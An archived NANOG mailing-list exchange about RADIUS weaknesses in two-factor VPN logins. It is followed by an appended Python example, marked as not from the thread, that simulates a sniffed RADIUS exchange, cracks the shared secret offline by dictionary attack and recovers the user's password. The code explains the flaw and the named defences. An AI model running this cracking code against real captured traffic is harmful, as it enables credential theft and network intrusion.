[190338] in North American Network Operators' Group
Re: Cisco 2 factor authentication
daemon@ATHENA.MIT.EDU (Tom Smyth)
Sun Jun 26 21:36:13 2016
X-Original-To: nanog@nanog.org
In-Reply-To: <CAAAwwbUCrC3VX106bfEV0AyBFu2mroPUJt_gfUZrQsiMdWgLJg@mail.gmail.com>
Date: Mon, 27 Jun 2016 02:36:10 +0100
From: Tom Smyth <tom.smyth@wirelessconnect.eu>
To: Jimmy Hess <mysidia@gmail.com>
Cc: NANOG <nanog@nanog.org>
Errors-To: nanog-bounces@nanog.org
The RADIUS protocol traffic can be encrypted with IPsec policies... if
confidentiality of the RADIUS traffic is a concern (particularly if
traversing untrusted networks).
On 26 Jun 2016 3:48 a.m., "Jimmy Hess" <mysidia@gmail.com> wrote:
> On Wed, Jun 22, 2016 at 9:38 PM, Chris Lawrence
> <clawrence@dovefire.co.uk> wrote:
> > Any RADIUS-based auth works well. I've used a solution by secure envoy in
> > the past which seems to work well; they also have soft token apps, hard
> > tokens plus SMS based.
>
> However, a cautionary note there is that the RADIUS protocol itself uses
> only weak cryptography and is not secure on the wire.
>
> That is, in the absence of the AES Keywrap proprietary extension, or when
> the method of credential used is not authentication using a
> client-side certificate (PKI) as in *EAP.
>
> Specifically: if RADIUS is used for the Authentication stage of AAA
> with a code sent by SMS or OATH token [user types normal password +
> one-time password], then when traffic between the RADIUS server and VPN
> device is captured, the user credentials may be exposed with the
> extremely weak crypto protection RADIUS or NTLM provides for the
> user password.
>
> If a user re-uses the same password somewhere else on a device not
> requiring 2FA, then capturing RADIUS traffic could be an effective
> privilege escalation, by copying the victim's password from a sniffed
> RADIUS exchange.
>
> --
> -JH
>
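The mechanism behind the "weak crypto protection" Jimmy describes, as an added worked example that is not part of the original thread: RFC 2865 hides the User-Password attribute by XORing it with an MD5 stream keyed on the shared secret and the per-request Request Authenticator, and the Access-Accept carries a Response Authenticator that is a plain MD5 over the packet plus the same secret. Anyone who can sniff a request/response pair therefore has an offline oracle for guessing the shared secret, and once the secret is known every captured password (static part plus the appended OTP) falls out. The shared secret "testing123", the password, the wordlist and the Reply-Message attribute below are all constructed for this example; the sketch of the exchange is mine, not a packet from the list.

```python
"""RFC 2865 User-Password hiding and the Response Authenticator, used to show how a
sniffed RADIUS exchange gives up the shared secret and then the user's password.
Added example with constructed data; not code from the original thread."""
import hashlib
import secrets
import struct
from typing import Dict, Iterable, Optional, Tuple

BLOCK = 16  # MD5 digest size; RFC 2865 hides the password in 16-byte blocks


def hide_password(password: bytes, shared_secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 s5.2: pad with NULs to a multiple of 16, then for each block
    c_i = p_i XOR MD5(secret || c_{i-1}), with c_0 = Request Authenticator."""
    if len(request_auth) != BLOCK:
        raise ValueError("Request Authenticator must be 16 bytes")
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % BLOCK)
    hidden = bytearray()
    prev = request_auth
    for i in range(0, len(padded), BLOCK):
        keystream = hashlib.md5(shared_secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + BLOCK], keystream))
        hidden += block
        prev = block
    return bytes(hidden)


def reveal_password(hidden: bytes, shared_secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password; strips the NUL padding RFC 2865 adds."""
    if not hidden or len(hidden) % BLOCK:
        raise ValueError("hidden User-Password must be a non-empty multiple of 16 bytes")
    plain = bytearray()
    prev = request_auth
    for i in range(0, len(hidden), BLOCK):
        block = hidden[i:i + BLOCK]
        keystream = hashlib.md5(shared_secret + prev).digest()
        plain += bytes(c ^ k for c, k in zip(block, keystream))
        prev = block
    return bytes(plain).rstrip(b"\x00")


def response_authenticator(code: int, identifier: int, request_auth: bytes,
                           attributes: bytes, shared_secret: bytes) -> bytes:
    """RFC 2865 s3: MD5(Code || ID || Length || RequestAuth || Attributes || Secret).
    Nothing here is keyed with a MAC; the secret is just appended to the hash input."""
    length = 20 + len(attributes)  # 20-byte header plus attributes
    header = struct.pack("!BBH", code, identifier, length)
    return hashlib.md5(header + request_auth + attributes + shared_secret).digest()


def simulate_exchange(shared_secret: bytes, password: bytes, identifier: int = 0x2A) -> Dict:
    """What an on-path sniffer sees: the Access-Request's Request Authenticator and
    hidden User-Password, and the Access-Accept (code 2) with its Response Authenticator.
    The Reply-Message attribute (type 18) is constructed filler."""
    request_auth = secrets.token_bytes(BLOCK)
    hidden = hide_password(password, shared_secret, request_auth)
    reply = b"Welcome"
    accept_attrs = bytes([18, 2 + len(reply)]) + reply
    return {
        "request_auth": request_auth,
        "hidden_password": hidden,
        "response_code": 2,
        "identifier": identifier,
        "response_attrs": accept_attrs,
        "response_auth": response_authenticator(2, identifier, request_auth,
                                                accept_attrs, shared_secret),
    }


def crack_shared_secret(capture: Dict, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute the Response Authenticator for each candidate
    secret and compare with the one captured on the wire."""
    for candidate in wordlist:
        guess = response_authenticator(capture["response_code"], capture["identifier"],
                                       capture["request_auth"], capture["response_attrs"],
                                       candidate)
        if guess == capture["response_auth"]:
            return candidate
    return None


def recover_password_from_capture(capture: Dict,
                                  wordlist: Iterable[bytes]) -> Optional[Tuple[bytes, bytes]]:
    """Secret first, then the password (static part + OTP) from the same capture."""
    secret = crack_shared_secret(capture, wordlist)
    if secret is None:
        return None
    return secret, reveal_password(capture["hidden_password"], secret, capture["request_auth"])


# Constructed demo inputs (not from the thread): a guessable shared secret,
# a static password with a 6-digit OTP appended, and a small wordlist.
SHARED_SECRET = b"testing123"
PASSWORD = b"Summer2016!" + b"492871"
WORDLIST = [b"password", b"radius", b"secret", b"testing123", b"changeme"]

if __name__ == "__main__":
    cap = simulate_exchange(SHARED_SECRET, PASSWORD)
    print("sniffed hidden User-Password:", cap["hidden_password"].hex())
    print("recovered (secret, password):", recover_password_from_capture(cap, WORDLIST))
```

The OTP buys nothing against this capture: the attacker gets the whole typed string, and the static part is what gets reused elsewhere, which is the escalation path described above. The defences the thread names both remove the exposed material: IPsec between NAS and RADIUS server takes the packets off an untrusted wire, and certificate-based EAP means no password is ever carried in User-Password at all.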